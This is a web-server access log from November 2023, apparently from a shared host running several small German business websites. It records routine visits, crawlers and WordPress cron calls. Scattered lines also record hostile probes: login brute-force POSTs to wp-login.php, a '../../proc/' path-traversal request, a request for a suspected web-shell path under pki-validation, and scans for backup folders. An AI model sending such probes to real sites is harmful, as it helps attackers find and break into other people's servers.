92.206.191.0 - - [06/Nov/2023:16:55:40 +0100] "GET /wp-content/uploads/services-1.jpg HTTP/1.1" 200 45657 "https://www.computerdoc24.de/service/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.7.9 Mobile/15E148 Safari/604.1 (Ecosia ios@9.0.2.1231)"
92.206.191.0 - - [06/Nov/2023:16:56:35 +0100] "GET /wp-content/uploads/meeting-1.jpg HTTP/1.1" 200 47942 "https://www.computerdoc24.de/service/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.7.9 Mobile/15E148 Safari/604.1 (Ecosia ios@9.0.2.1231)"
81.169.178.0 - - [06/Nov/2023:16:57:43 +0100] "POST /wp-cron.php?doing_wp_cron=1699286262.9846320152282714843750 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699286262.9846320152282714843750" "WordPress/5.2.19; https://www.computerdoc24.de"
92.206.191.0 - - [06/Nov/2023:16:57:42 +0100] "POST /?wc-ajax=get_refreshed_fragments HTTP/1.1" 200 177 "https://www.computerdoc24.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.7.9 Mobile/15E148 Safari/604.1 (Ecosia ios@9.0.2.1231)"
51.79.68.0 - - [06/Nov/2023:16:57:46 +0100] "GET /kontakt HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
51.79.68.0 - - [06/Nov/2023:16:57:48 +0100] "GET /kontakt/ HTTP/1.1" 200 14138 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
74.208.243.0 - - [06/Nov/2023:16:57:50 +0100] "GET /service HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
74.208.243.0 - - [06/Nov/2023:16:57:53 +0100] "GET /service/ HTTP/1.1" 200 16015 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
51.79.64.0 - - [06/Nov/2023:16:57:58 +0100] "GET /impressum HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
51.79.64.0 - - [06/Nov/2023:16:58:01 +0100] "GET /impressum/ HTTP/1.1" 200 14283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
51.79.65.0 - - [06/Nov/2023:16:58:04 +0100] "GET / HTTP/1.1" 200 20478 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
81.169.178.0 - - [06/Nov/2023:16:59:48 +0100] "POST /wp-cron.php?doing_wp_cron=1699286388.7009479999542236328125 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699286388.7009479999542236328125" "WordPress/5.2.19; https://www.computerdoc24.de"
92.206.191.0 - - [06/Nov/2023:16:59:48 +0100] "GET / HTTP/1.1" 200 20479 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.7.9 Mobile/15E148 Safari/604.1 (Ecosia ios@9.0.2.1231)"
92.206.191.0 - - [06/Nov/2023:16:59:53 +0100] "GET / HTTP/1.1" 200 20484 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.7.9 Mobile/15E148 Safari/604.1 (Ecosia ios@9.0.2.1231)"
62.122.184.0 - - [06/Nov/2023:17:03:36 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
81.169.178.0 - - [06/Nov/2023:17:06:41 +0100] "POST /wp-cron.php?doing_wp_cron=1699286801.4235188961029052734375 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699286801.4235188961029052734375" "WordPress/5.8.8; https://www.ipcbusiness.de"
141.94.247.0 - - [06/Nov/2023:17:06:39 +0100] "POST /wp-login.php HTTP/1.1" 503 7324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
79.236.137.0 - - [06/Nov/2023:17:14:08 +0100] "GET /apple-touch-icon.png HTTP/1.1" 200 41020 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
79.236.137.0 - - [06/Nov/2023:17:14:09 +0100] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 200 41116 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
81.169.178.0 - - [06/Nov/2023:17:14:09 +0100] "POST /wp-cron.php?doing_wp_cron=1699287249.2208099365234375000000 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699287249.2208099365234375000000" "WordPress/5.8.8; https://www.ipcbusiness.de"
79.236.137.0 - - [06/Nov/2023:17:14:08 +0100] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
79.236.137.0 - - [06/Nov/2023:17:14:08 +0100] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 200 41116 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
:: - - [06/Nov/2023:17:14:16 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
79.236.137.0 - - [06/Nov/2023:17:14:09 +0100] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
79.236.137.0 - - [06/Nov/2023:17:14:09 +0100] "GET /apple-touch-icon.png HTTP/1.1" 200 41020 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
79.236.137.0 - - [06/Nov/2023:17:14:08 +0100] "GET / HTTP/1.1" 200 70287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
79.236.137.0 - - [06/Nov/2023:17:14:08 +0100] "GET / HTTP/1.1" 200 70287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
:: - - [06/Nov/2023:17:14:17 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
79.236.137.0 - - [06/Nov/2023:17:14:17 +0100] "GET /wp-content/uploads/applaipadret.png HTTP/1.1" 200 17805 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
79.236.137.0 - - [06/Nov/2023:17:14:17 +0100] "GET /wp-content/uploads/favicon.png HTTP/1.1" 200 1240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
79.236.137.0 - - [06/Nov/2023:17:14:17 +0100] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
79.236.137.0 - - [06/Nov/2023:17:14:17 +0100] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 200 41116 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
81.169.178.0 - - [06/Nov/2023:17:14:17 +0100] "GET / HTTP/1.1" 200 16116 "https://www.ipcbusiness.de/" "WordPress/5.8.8; https://www.ipcbusiness.de"
79.236.137.0 - - [06/Nov/2023:17:14:17 +0100] "GET /apple-touch-icon.png HTTP/1.1" 200 41020 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 eM Client/9.2.2093.0"
81.169.178.0 - - [06/Nov/2023:17:14:09 +0100] "POST /wp-cron.php?doing_wp_cron=1699287249.2208321094512939453125 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699287249.2208321094512939453125" "WordPress/5.8.8; https://www.ipcbusiness.de"
:: - - [06/Nov/2023:17:14:25 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
:: - - [06/Nov/2023:17:14:26 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
:: - - [06/Nov/2023:17:14:27 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
79.236.137.0 - - [06/Nov/2023:17:14:38 +0100] "-" 408 - "-" "-"
79.236.137.0 - - [06/Nov/2023:17:14:38 +0100] "-" 408 - "-" "-"
:: - - [06/Nov/2023:17:14:40 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
:: - - [06/Nov/2023:17:14:41 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
54.147.120.0 - - [06/Nov/2023:17:15:34 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"
40.77.167.0 - - [06/Nov/2023:17:19:02 +0100] "GET /robots.txt HTTP/1.1" 404 2591 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.0 - - [06/Nov/2023:17:19:06 +0100] "GET /html/anfahrtskosten.html HTTP/1.1" 200 2353 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
71.6.232.0 - - [06/Nov/2023:17:19:50 +0100] "GET / HTTP/1.1" 403 2411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
62.138.2.0 - - [06/Nov/2023:17:26:19 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [06/Nov/2023:17:26:22 +0100] "GET /unsere-maerkte/feste-routen/ HTTP/1.1" 200 11326 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
81.169.178.0 - - [06/Nov/2023:17:26:21 +0100] "POST /wp-cron.php?doing_wp_cron=1699287981.0107889175415039062500 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699287981.0107889175415039062500" "WordPress/5.8.8; https://www.ipcbusiness.de"
165.232.149.0 - - [06/Nov/2023:17:27:50 +0100] "GET /cgi-bin/.well-known/pki-validation/index.php HTTP/1.1" 301 275 "http://simplesite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
165.232.149.0 - - [06/Nov/2023:17:27:51 +0100] "GET /cgi-bin/.well-known/pki-validation/index.php HTTP/1.1" 200 - "http://ipcbusiness.de/cgi-bin/.well-known/pki-validation/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
165.232.149.0 - - [06/Nov/2023:17:27:52 +0100] "GET /cgi-bin/.well-known/pki-validation/ HTTP/1.1" 200 41140 "https://ipcbusiness.de/cgi-bin/.well-known/pki-validation/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
106.3.146.0 - - [06/Nov/2023:17:32:27 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
185.217.1.0 - - [06/Nov/2023:17:42:33 +0100] "HEAD / HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
66.249.64.0 - - [06/Nov/2023:17:45:24 +0100] "GET /html/site.css HTTP/1.1" 200 88 "http://reinigungsprofi-weck.de/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/118.0.5993.117 Safari/537.36"
66.249.64.0 - - [06/Nov/2023:17:46:22 +0100] "GET /robots.txt HTTP/1.1" 404 2591 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.0 - - [06/Nov/2023:17:46:23 +0100] "GET /assets/images/autogen/Kontakt_Nregular_1_1.gif HTTP/1.1" 200 1596 "-" "Googlebot-Image/1.0"
66.249.64.0 - - [06/Nov/2023:17:46:40 +0100] "GET /kv_none_poetic_cream_none_1.gif HTTP/1.1" 200 248 "-" "Googlebot-Image/1.0"
62.138.2.0 - - [06/Nov/2023:17:46:56 +0100] "GET /unsere-produkte-und-services/kombiverkehr-gruener-transport/ HTTP/1.1" 200 11198 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
89.246.241.0 - - [06/Nov/2023:17:47:02 +0100] "GET /pc-ankauf/ HTTP/1.1" 200 13755 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
66.249.64.0 - - [06/Nov/2023:17:47:12 +0100] "GET /assets/images/autogen/Spezialreinigung-_Hhighlighted_1_1.gif HTTP/1.1" 200 1750 "-" "Googlebot-Image/1.0"
81.169.178.0 - - [06/Nov/2023:17:47:05 +0100] "POST /wp-cron.php?doing_wp_cron=1699289225.7474670410156250000000 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699289225.7474670410156250000000" "WordPress/5.2.19; https://www.computerdoc24.de"
62.138.2.0 - - [06/Nov/2023:17:47:15 +0100] "GET /en/ueber-uns/soziale-verantwortung/ HTTP/1.1" 200 11021 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
66.249.64.0 - - [06/Nov/2023:17:47:19 +0100] "GET /subheader_br.gif HTTP/1.1" 200 1693 "-" "Googlebot-Image/1.0"
66.249.64.0 - - [06/Nov/2023:17:48:04 +0100] "GET /favicon.ico HTTP/1.1" 404 2593 "-" "Googlebot-Image/1.0"
66.249.64.0 - - [06/Nov/2023:17:48:08 +0100] "GET /header_l.gif HTTP/1.1" 200 7358 "-" "Googlebot-Image/1.0"
54.36.149.0 - - [06/Nov/2023:17:48:38 +0100] "GET /unsere-produkte-und-services/ HTTP/1.1" 200 10927 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.222.253.0 - - [06/Nov/2023:17:49:01 +0100] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [06/Nov/2023:17:49:03 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
116.202.100.0 - - [06/Nov/2023:17:49:05 +0100] "GET / HTTP/1.1" 200 70287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
66.249.64.0 - - [06/Nov/2023:17:49:47 +0100] "GET /subheader_l.gif HTTP/1.1" 200 2832 "-" "Googlebot-Image/1.0"
66.249.64.0 - - [06/Nov/2023:17:50:57 +0100] "GET /assets/images/autogen/Anfahrtskosten_Nregular_1_1.gif HTTP/1.1" 200 1732 "-" "Googlebot-Image/1.0"
66.249.64.0 - - [06/Nov/2023:17:51:53 +0100] "GET /subheader_bl.gif HTTP/1.1" 200 1883 "-" "Googlebot-Image/1.0"
66.249.64.0 - - [06/Nov/2023:17:52:31 +0100] "GET /subheader_r.gif HTTP/1.1" 200 1036 "-" "Googlebot-Image/1.0"
66.249.64.0 - - [06/Nov/2023:17:52:34 +0100] "GET /assets/images/autogen/Impressum_Nregular_1_1.gif HTTP/1.1" 200 1218 "-" "Googlebot-Image/1.0"
66.249.64.0 - - [06/Nov/2023:17:53:42 +0100] "GET /assets/images/autogen/Vorher-Nachher_Nregular_1_1.gif HTTP/1.1" 200 1718 "-" "Googlebot-Image/1.0"
66.249.64.0 - - [06/Nov/2023:17:56:47 +0100] "GET /assets/images/autogen/Referenzen_Nregular_1_1.gif HTTP/1.1" 200 1249 "-" "Googlebot-Image/1.0"
52.109.28.0 - - [06/Nov/2023:17:58:17 +0100] "GET /FPURL.xml HTTP/1.1" 200 2691 "-" "-"
185.36.81.0 - - [06/Nov/2023:18:14:14 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.0 - - [06/Nov/2023:18:21:43 +0100] "GET / HTTP/1.1" 403 2409 "-" "-"
81.169.178.0 - - [06/Nov/2023:18:23:39 +0100] "POST /wp-cron.php?doing_wp_cron=1699291419.6043090820312500000000 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699291419.6043090820312500000000" "WordPress/5.8.8; https://www.ipcbusiness.de"
192.71.144.0 - - [06/Nov/2023:18:23:39 +0100] "POST /wp-login.php HTTP/1.1" 503 7324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
81.169.178.0 - - [06/Nov/2023:18:27:49 +0100] "POST /wp-cron.php?doing_wp_cron=1699291669.2238619327545166015625 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699291669.2238619327545166015625" "WordPress/5.8.8; https://www.ipcbusiness.de"
62.138.2.0 - - [06/Nov/2023:18:27:49 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [06/Nov/2023:18:27:50 +0100] "GET /it/linieninformationen/ HTTP/1.1" 200 12506 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
81.169.178.0 - - [06/Nov/2023:18:28:33 +0100] "POST /wp-cron.php?doing_wp_cron=1699291713.2824718952178955078125 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699291713.2824718952178955078125" "WordPress/5.2.19; https://www.computerdoc24.de"
89.246.241.0 - - [06/Nov/2023:18:28:32 +0100] "GET /product/logitech-oem-optical-mouse-b100-black/ HTTP/1.1" 200 15409 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
62.138.2.0 - - [06/Nov/2023:18:30:09 +0100] "GET /ueber-uns/ipc-business-gmbh-firmeninformation/ HTTP/1.1" 200 11924 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
81.169.178.0 - - [06/Nov/2023:18:31:01 +0100] "POST /wp-cron.php?doing_wp_cron=1699291861.5521049499511718750000 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699291861.5521049499511718750000" "WordPress/5.2.19; https://www.computerdoc24.de"
103.176.78.0 - - [06/Nov/2023:18:31:01 +0100] "POST /wp-login.php HTTP/1.1" 503 7311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0"
20.120.74.0 - - [06/Nov/2023:18:36:52 +0100] "GET /robots.txt HTTP/1.1" 404 2607 "-" "python-requests/2.27.1"
20.120.74.0 - - [06/Nov/2023:18:37:00 +0100] "GET / HTTP/1.1" 200 2590 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
167.235.1.0 - - [06/Nov/2023:18:52:34 +0100] "GET / HTTP/1.1" 200 16151 "-" "GuzzleHttp/7"
81.169.178.0 - - [06/Nov/2023:18:52:38 +0100] "POST /wp-cron.php?doing_wp_cron=1699293157.9115378856658935546875 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699293157.9115378856658935546875" "WordPress/5.8.8; https://www.ipcbusiness.de"
114.119.145.0 - - [06/Nov/2023:18:52:37 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
68.69.185.0 - - [06/Nov/2023:18:52:51 +0100] "GET / HTTP/1.1" 403 2409 "-" "-"
68.69.185.0 - - [06/Nov/2023:18:52:58 +0100] "GET ../../proc/ HTTP" 400 226 "-" "-"
199.45.155.0 - - [06/Nov/2023:18:53:15 +0100] "GET / HTTP/1.1" 403 2409 "-" "-"
81.169.178.0 - - [06/Nov/2023:18:53:16 +0100] "POST /wp-cron.php?doing_wp_cron=1699293196.5220470428466796875000 HTTP/1.1" 200 - "http://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699293196.5220470428466796875000" "WordPress/5.2.19; https://www.computerdoc24.de"
199.45.155.0 - - [06/Nov/2023:18:53:15 +0100] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.0 - - [06/Nov/2023:18:53:18 +0100] "PRI * HTTP/2.0" 400 226 "-" "-"
199.45.155.0 - - [06/Nov/2023:18:53:19 +0100] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.0 - - [06/Nov/2023:18:53:21 +0100] "PRI * HTTP/2.0" 400 226 "-" "-"
199.45.155.0 - - [06/Nov/2023:18:53:22 +0100] "GET / HTTP/1.1" 200 20478 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.0 - - [06/Nov/2023:18:53:24 +0100] "PRI * HTTP/2.0" 400 226 "-" "-"
199.45.155.0 - - [06/Nov/2023:18:53:25 +0100] "GET /wp-content/uploads/favicon-3.png HTTP/1.1" 200 944 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.0 - - [06/Nov/2023:18:53:26 +0100] "GET /wp-content/uploads/appleiphone-3.png HTTP/1.1" 200 3007 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.0 - - [06/Nov/2023:18:53:27 +0100] "GET /wp-content/uploads/appleiphoneretina-3.png HTTP/1.1" 200 5882 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.0 - - [06/Nov/2023:18:53:28 +0100] "GET /wp-content/uploads/appleipad-3.png HTTP/1.1" 200 3776 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.0 - - [06/Nov/2023:18:53:29 +0100] "GET /wp-content/uploads/appleipadretina-6.png HTTP/1.1" 200 7645 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.0 - - [06/Nov/2023:18:53:30 +0100] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
209.160.120.0 - - [06/Nov/2023:18:56:15 +0100] "HEAD /wordpress HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.160.120.0 - - [06/Nov/2023:18:56:15 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.160.120.0 - - [06/Nov/2023:18:56:15 +0100] "HEAD /wp HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.160.120.0 - - [06/Nov/2023:18:56:16 +0100] "HEAD /bc HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.160.120.0 - - [06/Nov/2023:18:56:16 +0100] "HEAD /bk HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.160.120.0 - - [06/Nov/2023:18:56:16 +0100] "HEAD /backup HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.160.120.0 - - [06/Nov/2023:18:56:16 +0100] "HEAD /old HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.160.120.0 - - [06/Nov/2023:18:56:16 +0100] "HEAD /new HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.160.120.0 - - [06/Nov/2023:18:56:17 +0100] "HEAD /main HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.160.120.0 - - [06/Nov/2023:18:56:17 +0100] "HEAD /home HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
192.241.236.0 - - [06/Nov/2023:18:58:34 +0100] "GET / HTTP/1.1" 403 2411 "-" "Mozilla/5.0 zgrab/0.x"
81.169.178.0 - - [06/Nov/2023:19:02:25 +0100] "POST /wp-cron.php?doing_wp_cron=1699293745.4179871082305908203125 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699293745.4179871082305908203125" "WordPress/5.2.19; https://www.computerdoc24.de"
